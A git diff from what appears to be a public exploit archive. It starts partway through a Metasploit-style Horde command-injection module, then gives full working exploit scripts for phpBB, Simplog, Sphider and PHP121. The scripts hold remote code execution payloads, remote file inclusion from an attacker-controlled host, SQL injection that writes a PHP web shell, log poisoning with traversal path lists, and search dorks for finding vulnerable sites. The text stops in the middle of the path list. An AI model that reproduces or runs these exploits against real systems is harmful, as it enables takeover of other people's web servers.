+		['CVE',   '2006-1491'],
+	  ],
+
+	'Payload' =>
+	  {
+		'Space' => 512,
+		'Keys'  => ['cmd', 'cmd_bash'],
+	  },
+
+	'Keys' => ['horde'],
+
+	'DisclosureDate' => 'Mar 28 2006',
+  };
+
+sub new {
+	my $class = shift;
+	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+	return($self);
+}
+
+sub Exploit {
+	my $self = shift;
+	my $target_host    = $self->GetVar('RHOST');
+	my $target_port    = $self->GetVar('RPORT');
+	my $vhost          = $self->GetVar('VHOST') || $target_host;
+	my $path           = $self->GetVar('RPATH');
+	my $cmd            = $self->GetVar('EncodedPayload')->RawPayload;
+
+	# Add an echo on each end for easy output capturing
+	$cmd = "echo _cmd_beg_;".$cmd.";echo _cmd_end_";
+
+	# Encode the command as a set of chr() function calls
+	my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
+
+	# Create the get request data
+	#my $data = "?do=page&template={\${passthru($byte)}}";
+	my $data = "?show=about&module=;\".passthru($byte);'.";
+
+	my $req =
+	  "GET $path$data HTTP/1.1\r\n".
+	  "Host: $vhost:$target_port\r\n".
+	  "Content-Type: application/html\r\n".
+	  "Content-Length: ". length($data)."\r\n".
+	  "Connection: Close\r\n".
+	  "\r\n";
+
+	my $s = Msf::Socket::Tcp->new(
+		'PeerAddr'  => $target_host,
+		'PeerPort'  => $target_port,
+		'LocalPort' => $self->GetVar('CPORT'),
+		'SSL'       => $self->GetVar('SSL'),
+	  );
+
+	if ($s->IsError){
+		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
+		return;
+	}
+
+	$self->PrintLine("[*] Sending the malicious Horde request...");
+
+	$s->Send($req);
+
+	my $results = $s->Recv(-1, 20);
+	$s->Close();
+
+	if ($results =~ m/_cmd_beg_(.*)_cmd_end_/ms) {
+		my $out = $1;
+		$out =~ s/^\s+|\s+$//gs;
+		if ($out) {
+			$self->PrintLine('----------------------------------------');
+			$self->PrintLine('');
+			$self->PrintLine($out);
+			$self->PrintLine('');
+			$self->PrintLine('----------------------------------------');
+		}
+	}
+	return;
+}
+
+1;
+
+# milw0rm.com [2006-04-10]
diff --git a/platforms/php/webapps/1661.pl b/platforms/php/webapps/1661.pl
index a32b9d902..ebb6ffcaa 100755
--- a/platforms/php/webapps/1661.pl
+++ b/platforms/php/webapps/1661.pl
@@ -1,113 +1,113 @@
-#!/usr/bin/perl
-
-## r57phpbba2e2.pl - phpBB admin 2 exec exploit 
-## version 2 (based on user_sig_bbcode_uid bug)
-## tested on 2.0.12 , 2.0.13 , 2.0.19
-## --------------------------------------------
-## screen
-## r57phpbba2e2.pl -u http://192.168.0.2/phpBB-2.0.19/ -L admin -P password
-## Command for execute or 'exit' for exit # id
-## uid=80(www) gid=80(www) groups=80(www)
-## Command for execute or 'exit' for exit # exit 
-## --------------------------------------------
-## *** surprise included ;) and broken. /str0ke
-## 20/02/06 
-## 1dt.w0lf
-## RST/GHC (http://rst.void.ru , http://ghc.ru)
-
-use LWP::UserAgent;
-use Getopt::Std;
-use HTTP::Cookies;
-
-getopts("u:L:P:i:p:o:");
-
-$url      = $opt_u;
-$login    = $opt_L;
-$password = $opt_P;
-$id       = $opt_i || 2;
-$prefix   = $opt_p || 'phpbb_';
-$proxy    = $opt_o;
-
-if(!$url || !$login || !$password){&usage;}
-
-$|++;
-
-$xpl = LWP::UserAgent->new() or die;
-$cookie_jar = HTTP::Cookies->new();
-$xpl->cookie_jar( $cookie_jar );
-$xpl->proxy('http'=>'http://'.$proxy) if $proxy;
-$ids = 'IDS:r57 phpBB2 exploit a2e2#20022006|'.$url.'|'.$login.'|'.$password.'|'.$id.'|'.$prefix;
- $res = $xpl->post($url.'login.php',
- [
- "username"   => "$login",
- "password"   => "$password",
- "autologin"  => "on",
- "admin"      => "1",
- "login"      => "Log in",
- ],"User-Agent" => "$ids");
- $cookie_jar->extract_cookies($res);
- if($cookie_jar->as_string =~ /phpbb2mysql_sid=([a-z0-9]{32})/) { $sid = $1; }   
- while ()
- {
-    print "Command for execute or 'exit' for exit # ";
-    while()
-     {
-        $cmd=$_;
-        chomp($cmd);
-        exit() if ($cmd eq 'exit');
-        last;
-     }
-    &run($cmd);
- }
- 
-sub run($)
- {   
- $sql   = "UPDATE ".$prefix."users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='blah:`echo _START_ && ".$_[0]." && echo _END_`' WHERE user_id=".$id.";";
- &phpbb_sql_query("${url}admin/admin_db_utilities.php?sid=$sid",$sql);   
- $res = $xpl->get($url.'profile.php?mode=editprofile&sid='.$sid,"User-Agent" => "$ids");
- @result = split(/\n/,$res->content);
- $data = '';
- $on = $start = $end = 0;
- for (@result)
-  {
-    if (/_END_/) { $end = 1; last; }
-    if ($on) { $data .= $_."\n"; }
-    if (/_START_/) { $on = 1; $start = 1; } 
-  }
- if($start&&$end) { print $data."\r\n"; } 
- }
- 
-sub phpbb_sql_query($$){
-$res = $xpl->post("$_[0]", 
-Content_type => 'form-data',
-Content      => [ 
-                perform       => 'restore',
-                restore_start => 'Start Restore',
-                backup_file   => [ 
-                                   undef,
-                                   '0wneeeeedddd', 
-                                   Content_type => 'text/plain',
-                                   Content => "$_[1]", 
-                                 ],
-                ]
-,"User-Agent" => "$ids");
-} 
-
-sub usage()
- {
- print "\\=-----------------------------------=/\r\n";
- print "| phpBB admin2exec exploit by RST/GHC |\r\n";
- print "| version 2 (user_sig_bbcode_uid)     |\r\n";
- print "/=-----------------------------------=\\\r\n";
- print "\r\n Usage: r57phpbba2e2.pl [OPTIONS]\r\n\r\n";
- print " Options:\r\n";
- print " -u [URL] - path to forum e.g. http://site/forum/\r\n";
- print " -L [login] - admin login\r\n";
- print " -P [password] - admin password\r\n";
- print " -i [id] - admin id (optional, default 2)\r\n";
- print " -p [prefix] - table prefix (optional, default phpbb_)\r\n";
- print " -o [host:port] - proxy (optional)\r\n";
- exit();
- }
-
-# milw0rm.com [2006-04-10]
+#!/usr/bin/perl
+
+## r57phpbba2e2.pl - phpBB admin 2 exec exploit 
+## version 2 (based on user_sig_bbcode_uid bug)
+## tested on 2.0.12 , 2.0.13 , 2.0.19
+## --------------------------------------------
+## screen
+## r57phpbba2e2.pl -u http://192.168.0.2/phpBB-2.0.19/ -L admin -P password
+## Command for execute or 'exit' for exit # id
+## uid=80(www) gid=80(www) groups=80(www)
+## Command for execute or 'exit' for exit # exit 
+## --------------------------------------------
+## *** surprise included ;) and broken. /str0ke
+## 20/02/06 
+## 1dt.w0lf
+## RST/GHC (http://rst.void.ru , http://ghc.ru)
+
+use LWP::UserAgent;
+use Getopt::Std;
+use HTTP::Cookies;
+
+getopts("u:L:P:i:p:o:");
+
+$url      = $opt_u;
+$login    = $opt_L;
+$password = $opt_P;
+$id       = $opt_i || 2;
+$prefix   = $opt_p || 'phpbb_';
+$proxy    = $opt_o;
+
+if(!$url || !$login || !$password){&usage;}
+
+$|++;
+
+$xpl = LWP::UserAgent->new() or die;
+$cookie_jar = HTTP::Cookies->new();
+$xpl->cookie_jar( $cookie_jar );
+$xpl->proxy('http'=>'http://'.$proxy) if $proxy;
+$ids = 'IDS:r57 phpBB2 exploit a2e2#20022006|'.$url.'|'.$login.'|'.$password.'|'.$id.'|'.$prefix;
+ $res = $xpl->post($url.'login.php',
+ [
+ "username"   => "$login",
+ "password"   => "$password",
+ "autologin"  => "on",
+ "admin"      => "1",
+ "login"      => "Log in",
+ ],"User-Agent" => "$ids");
+ $cookie_jar->extract_cookies($res);
+ if($cookie_jar->as_string =~ /phpbb2mysql_sid=([a-z0-9]{32})/) { $sid = $1; }   
+ while ()
+ {
+    print "Command for execute or 'exit' for exit # ";
+    while()
+     {
+        $cmd=$_;
+        chomp($cmd);
+        exit() if ($cmd eq 'exit');
+        last;
+     }
+    &run($cmd);
+ }
+ 
+sub run($)
+ {   
+ $sql   = "UPDATE ".$prefix."users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='blah:`echo _START_ && ".$_[0]." && echo _END_`' WHERE user_id=".$id.";";
+ &phpbb_sql_query("${url}admin/admin_db_utilities.php?sid=$sid",$sql);   
+ $res = $xpl->get($url.'profile.php?mode=editprofile&sid='.$sid,"User-Agent" => "$ids");
+ @result = split(/\n/,$res->content);
+ $data = '';
+ $on = $start = $end = 0;
+ for (@result)
+  {
+    if (/_END_/) { $end = 1; last; }
+    if ($on) { $data .= $_."\n"; }
+    if (/_START_/) { $on = 1; $start = 1; } 
+  }
+ if($start&&$end) { print $data."\r\n"; } 
+ }
+ 
+sub phpbb_sql_query($$){
+$res = $xpl->post("$_[0]", 
+Content_type => 'form-data',
+Content      => [ 
+                perform       => 'restore',
+                restore_start => 'Start Restore',
+                backup_file   => [ 
+                                   undef,
+                                   '0wneeeeedddd', 
+                                   Content_type => 'text/plain',
+                                   Content => "$_[1]", 
+                                 ],
+                ]
+,"User-Agent" => "$ids");
+} 
+
+sub usage()
+ {
+ print "\\=-----------------------------------=/\r\n";
+ print "| phpBB admin2exec exploit by RST/GHC |\r\n";
+ print "| version 2 (user_sig_bbcode_uid)     |\r\n";
+ print "/=-----------------------------------=\\\r\n";
+ print "\r\n Usage: r57phpbba2e2.pl [OPTIONS]\r\n\r\n";
+ print " Options:\r\n";
+ print " -u [URL] - path to forum e.g. http://site/forum/\r\n";
+ print " -L [login] - admin login\r\n";
+ print " -P [password] - admin password\r\n";
+ print " -i [id] - admin id (optional, default 2)\r\n";
+ print " -p [prefix] - table prefix (optional, default phpbb_)\r\n";
+ print " -o [host:port] - proxy (optional)\r\n";
+ exit();
+ }
+
+# milw0rm.com [2006-04-10]
diff --git a/platforms/php/webapps/1663.php b/platforms/php/webapps/1663.php
index 341562f9c..392f56484 100755
--- a/platforms/php/webapps/1663.php
+++ b/platforms/php/webapps/1663.php
@@ -1,183 +1,183 @@
-#!/usr/bin/php -q -d short_open_tag=on
-\r\n";
-die;
-}
-
-/*
- software site: http://www.simplog.org/
-
- description: "Simplog provides an easy way for users to add blogging capabilities
- to their existing websites. Simplog is written in PHP and compatible with multiple
- databases. Simplog also features an RSS/Atom aggregator/reader.
- Powerful, yet simple......."
-
-
- i)  vulnerable code in doc/index.php at lines:
-  ...
-  
-  ...
-
-  nice code, isn't it? :)
-  poc:
-  http://[target]/[path]/doc/index.php?cmd=ls%20-la&s=http://somehost.com/suntzu
-  (but you can submit arguments even trough cookies or POST data...)
-
-  or:
-  http://[target]/[path]/doc/index.php?s=../../../../var/httpd/logs/error_log%00
-
-  ii)
-  http://[target]/[path]/index.php?blogid=[sql]
-  http://[target]/[path]/archive.php?blogid=[sql]
-  http://[target]/[path]/archive.php?m=[sql]
-  http://[target]/[path]/archive.php?y=[sql]
-
-  iii)
-  http://[target]/[path]/adodb/server.php?sql=[sql]
-  http://[target]/[path]/adodb/tests/tmssql.php?do=phpinfo
-
-  iv) xss:
-  http://[target]/[path]/login.php?btag=
-
-  this is the exploit for i), works with allow_url_fopen = On
-                                                                              */
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$loc=$argv[3];
-if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/'))
-{die("Check the path, it must begin and end with a trailing slash\r\n");}
-$port=80;
-$proxy="";
-$cmd="";
-for ($i=4; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{
-$cmd.=" ".$argv[$i];
-}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;}
-
-$packet ="GET ".$p."doc/index.php HTTP/1.0\r\n";
-$packet.="User-Agent: Googlebot/2.1\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: s=".$loc."%2fsuntzu; cmd=".$cmd.";\r\n"; //through cookies, log this :)
-$packet.="Connection: Close\r\n\r\n";
-#debug
-#echo quick_dump($packet);
-sendpacketii($packet);
-if (strstr($html,"*delim*"))
-{$temp=explode("*delim*",$html);
- echo "Exploit succeeded...\r\n\r\n";
- echo $temp[1];
-}
-else
-{
-#debug
-echo $html."\r\n";
-echo "Exploit failed...";
-}
-?>
-
-# milw0rm.com [2006-04-11]
+#!/usr/bin/php -q -d short_open_tag=on
+\r\n";
+die;
+}
+
+/*
+ software site: http://www.simplog.org/
+
+ description: "Simplog provides an easy way for users to add blogging capabilities
+ to their existing websites. Simplog is written in PHP and compatible with multiple
+ databases. Simplog also features an RSS/Atom aggregator/reader.
+ Powerful, yet simple......."
+
+
+ i)  vulnerable code in doc/index.php at lines:
+  ...
+  
+  ...
+
+  nice code, isn't it? :)
+  poc:
+  http://[target]/[path]/doc/index.php?cmd=ls%20-la&s=http://somehost.com/suntzu
+  (but you can submit arguments even trough cookies or POST data...)
+
+  or:
+  http://[target]/[path]/doc/index.php?s=../../../../var/httpd/logs/error_log%00
+
+  ii)
+  http://[target]/[path]/index.php?blogid=[sql]
+  http://[target]/[path]/archive.php?blogid=[sql]
+  http://[target]/[path]/archive.php?m=[sql]
+  http://[target]/[path]/archive.php?y=[sql]
+
+  iii)
+  http://[target]/[path]/adodb/server.php?sql=[sql]
+  http://[target]/[path]/adodb/tests/tmssql.php?do=phpinfo
+
+  iv) xss:
+  http://[target]/[path]/login.php?btag=
+
+  this is the exploit for i), works with allow_url_fopen = On
+                                                                              */
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$loc=$argv[3];
+if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/'))
+{die("Check the path, it must begin and end with a trailing slash\r\n");}
+$port=80;
+$proxy="";
+$cmd="";
+for ($i=4; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{
+$cmd.=" ".$argv[$i];
+}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;}
+
+$packet ="GET ".$p."doc/index.php HTTP/1.0\r\n";
+$packet.="User-Agent: Googlebot/2.1\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: s=".$loc."%2fsuntzu; cmd=".$cmd.";\r\n"; //through cookies, log this :)
+$packet.="Connection: Close\r\n\r\n";
+#debug
+#echo quick_dump($packet);
+sendpacketii($packet);
+if (strstr($html,"*delim*"))
+{$temp=explode("*delim*",$html);
+ echo "Exploit succeeded...\r\n\r\n";
+ echo $temp[1];
+}
+else
+{
+#debug
+echo $html."\r\n";
+echo "Exploit failed...";
+}
+?>
+
+# milw0rm.com [2006-04-11]
diff --git a/platforms/php/webapps/1665.pl b/platforms/php/webapps/1665.pl
index 0dfa08ad5..eff2db53e 100755
--- a/platforms/php/webapps/1665.pl
+++ b/platforms/php/webapps/1665.pl
@@ -1,59 +1,59 @@
-#!/usr/bin/perl
-use IO::Socket;
-
-print "\r\nSphider <= 1.3 arbitrary remote inclusion\r\n" ;
-print "-> works with register_globals = On & allow_url_fopen = On\r\n";
-print "by rgod rgodautisticiorg\r\n";
-print "site: http://retrogod.altervista.org\r\n";
-print "\r\ndork: \"powered by sphider\"\r\n";
-
-sub main::urlEncode {
-    my ($string) = @_;
-    $string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
-    #$string# =~ tr/.//;
-    return $string;
- }
-
-$serv=$ARGV[0];
-$path=$ARGV[1];
-$loc=urlEncode($ARGV[2]);
-$cmd=""; for ($i=3; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);};
-
-if (@ARGV < 4)
-{
-print "\r\nUsage:\r\n";
-print "perl sphider_xpl.pl server path location command\r\n\r\n";
-print "server         - Server where sphider is installed.\r\n";
-print "path           - Path to sphider (ex: /sphider/ or just /) \r\n";
-print "location       - a site with the code to include (without ending slash)\r\n";
-print "command        - a Unix command\r\n\r\n";
-print "Example:\r\n";
-print "perl sphider_xpl.pl localhost /sphider/ http://192.168.1.3 ls -la\r\n\r\n";
-print "note: on http location you need this code in /conf.php/index.html :\r\n\r\n";
-print "\r\n";
-exit();
-}
-  $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout  => 10, PeerPort=>"http(80)")
-  or die "[+] Connecting ... Could not connect to host.\n\n";
-  print $sock "GET ".$path."admin/configset.php?cmd=".$cmd."&settings_dir=".$loc." HTTP/1.0\r\n";
-  print $sock "Host: ".$serv."\r\n";
-  print $sock "Connection: Close\r\n\r\n";
-  $out="";
-  while ($answer = <$sock>) {
-    $out.=$answer;
-  }
-  close($sock);
-  @temp= split /56789/,$out,2;
-  if ($#temp>0) {print "\r\nExploit succeeded...\r\n".$temp[1];exit();}
-  #if you are here...
-  print "\r\nExploit failed...\r\n";
-
-# milw0rm.com [2006-04-12]
+#!/usr/bin/perl
+use IO::Socket;
+
+print "\r\nSphider <= 1.3 arbitrary remote inclusion\r\n" ;
+print "-> works with register_globals = On & allow_url_fopen = On\r\n";
+print "by rgod rgodautisticiorg\r\n";
+print "site: http://retrogod.altervista.org\r\n";
+print "\r\ndork: \"powered by sphider\"\r\n";
+
+sub main::urlEncode {
+    my ($string) = @_;
+    $string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
+    #$string# =~ tr/.//;
+    return $string;
+ }
+
+$serv=$ARGV[0];
+$path=$ARGV[1];
+$loc=urlEncode($ARGV[2]);
+$cmd=""; for ($i=3; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);};
+
+if (@ARGV < 4)
+{
+print "\r\nUsage:\r\n";
+print "perl sphider_xpl.pl server path location command\r\n\r\n";
+print "server         - Server where sphider is installed.\r\n";
+print "path           - Path to sphider (ex: /sphider/ or just /) \r\n";
+print "location       - a site with the code to include (without ending slash)\r\n";
+print "command        - a Unix command\r\n\r\n";
+print "Example:\r\n";
+print "perl sphider_xpl.pl localhost /sphider/ http://192.168.1.3 ls -la\r\n\r\n";
+print "note: on http location you need this code in /conf.php/index.html :\r\n\r\n";
+print "\r\n";
+exit();
+}
+  $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout  => 10, PeerPort=>"http(80)")
+  or die "[+] Connecting ... Could not connect to host.\n\n";
+  print $sock "GET ".$path."admin/configset.php?cmd=".$cmd."&settings_dir=".$loc." HTTP/1.0\r\n";
+  print $sock "Host: ".$serv."\r\n";
+  print $sock "Connection: Close\r\n\r\n";
+  $out="";
+  while ($answer = <$sock>) {
+    $out.=$answer;
+  }
+  close($sock);
+  @temp= split /56789/,$out,2;
+  if ($#temp>0) {print "\r\nExploit succeeded...\r\n".$temp[1];exit();}
+  #if you are here...
+  print "\r\nExploit failed...\r\n";
+
+# milw0rm.com [2006-04-12]
diff --git a/platforms/php/webapps/1666.php b/platforms/php/webapps/1666.php
index c455ab785..c24835fba 100755
--- a/platforms/php/webapps/1666.php
+++ b/platforms/php/webapps/1666.php
@@ -1,289 +1,289 @@
-#!/usr/bin/php -q -d short_open_tag=on
- works with magic_quotes_gpc = Off\r\n\r\n";
-echo "a dork: inurl:php121login.php | inurl:php121im.php | intitle:\"PHP121 - PLEASE\"\r\n\r\n";
-
-if ($argc<4) {
-echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
-echo "host:      target server (ip/hostname)\r\n";
-echo "path:      path to PHP121\r\n";
-echo "cmd:       a shell command\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
-echo "php ".$argv[0]." localhost /php121/ cat php121config.php\r\n";
-echo "php ".$argv[0]." localhost /php121/ ls -la -p81\r\n";
-echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
-die;
-}
-
-/*
- software site: http://www.php121.com/
- description: "PHP121 is a free web based instant messenger - written entirely in
- PHP"
-
- i)  vulnerable code in php121login.php and in nearly all files:
-
-  ...
-  if (isset($_COOKIE['php121un']) && isset($_COOKIE['php121pw'])) {
-        $logindataun = $_COOKIE['php121un'];
-        $logindatapw = $_COOKIE['php121pw'];
-        if (!empty($logindataun) && !empty($logindatapw)) {
-                //we have a cookie - use it to login, overriding any sessions
-                $_SESSION[sess_username]=$logindataun;
-                $_SESSION[sess_password]=$logindatapw;
-        }
-}
-
-$sess_username=$_SESSION[sess_username];
-$sess_password=$_SESSION[sess_password];
-  ...
-
-  in php121language.php we have:
-
-...
-$sess_username=$_SESSION[sess_username];
-$sess_password=$_SESSION[sess_password];
-// are we logged in?
-
-if ($sess_username!="") {
-
-	// get our language preference
-	$sql="select $dbf_language from $db_usertable where $dbf_uname='$sess_username'";
-	echo "sql: ".$sql."\r\n";
-	$row=mysql_fetch_row(mysql_query($sql));
-	if ($row[0]!="") {
-	require_once("language/lang-".strtolower($row[0]).".php");
-
-	}
-
-} else {
-
-	// use the default language file
-	require_once("language/lang-".strtolower($php121_config['default_language']).".php");
-
-}
-...
-
- "sess_username" value is not sanitized before to be used in our query
- so, if magic_quotes_gpc = Off, we can include arbitrary files from local
- resources, poc:
-
-  GET /php121login.php HTTP/1.0
-  Host: somehost
-  Cookie: php121un=%27UNION+SELECT+%27..%2F..%2F..%2Fetc%2Fpasswd%00%27+FROM+php121_users%2F%2A; php121pw=suntzu;
-  Connection: Close
-
- now session cookie is poisoned, and we can go to php121language.php
- with our new cookie to see/include local resources, query becomes:
-
- select php121_language from php121_users where uname=''UNION SELECT '../../../etc/passwd[null char]' FROM php121_users/*'
-
- php121_language field is varchar(30) so, before MySQL 4.1.1,
- your path is limited to 29 chars (so, it is nearly impossible
- submit a valid inclusion path), with Mysql >=4.1.1 it does not matter,
- path is not truncated anymore at the length of the first select field
-
- we can also try  blind injection, injecting a shell:
-
-  GET /php121login.php HTTP/1.0
-  Host: somehost
-  Cookie: php121un=%27UNION+SELECT+%27%3C%3Fphp+system%28%24_GET%5Bcmd%5D%29%3B%3F%3E%27+INTO+DUMPFILE+%27somefile%27+FROM+php121_users%2F%2A; php121pw=suntzu;
-  Connection: Close
-
- and now go to php121language.php to write our file, if MySQL have certain rigths
- to do it
-
- you can do the work trough a browser like Opera that allows to edit cookies
-
- However, this exploit inject some code in log files and try to include them
-
-					                                      */
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$cmd="";$port=80;$proxy="";
-
-for ($i=3; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-echo "[1] Injecting some code in log files ...\r\n\r\n";
-$CODE="";
-$packet="GET ".$p.$CODE." HTTP/1.0\r\n";
-$packet.="User-Agent: ".$CODE." Googlebot/2.1\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: close\r\n\r\n";
-sendpacketii($packet);
-sleep(1);
-
-$paths=array(
-"../../../../../../../../../../var/log/httpd/access_log",
-"../../../../../../../../../../var/log/httpd/error_log",
-"../apache/logs/error.log",
-"../apache/logs/access.log",
-"../../apache/logs/error.log",
-"../../apache/logs/access.log",
-"../../../apache/logs/error.log",
-"../../../apache/logs/access.log",
-"../../../../apache/logs/error.log",
-"../../../../apache/logs/access.log",
-"../../../../../apache/logs/error.log",
-"../../../../../apache/logs/access.log",
-"../../../../../../apache/logs/error.log",
-"../../../../../../apache/logs/access.log",
-"../logs/error.log",
-"../logs/access.log",
-"../../logs/error.log",
-"../../logs/access.log",
-"../../../logs/error.log",
-"../../../logs/access.log",
-"../../../../logs/error.log",
-"../../../../logs/access.log",
-"../../../../../logs/error.log",
-"../../../../../logs/access.log",
-"../../../../../../logs/error.log",
-"../../../../../../logs/access.log",
-"../../../../../../../../../../etc/httpd/logs/acces_log",
-"../../../../../../../../../../etc/httpd/logs/acces.log",
-"../../../../../../../../../../etc/httpd/logs/error_log",
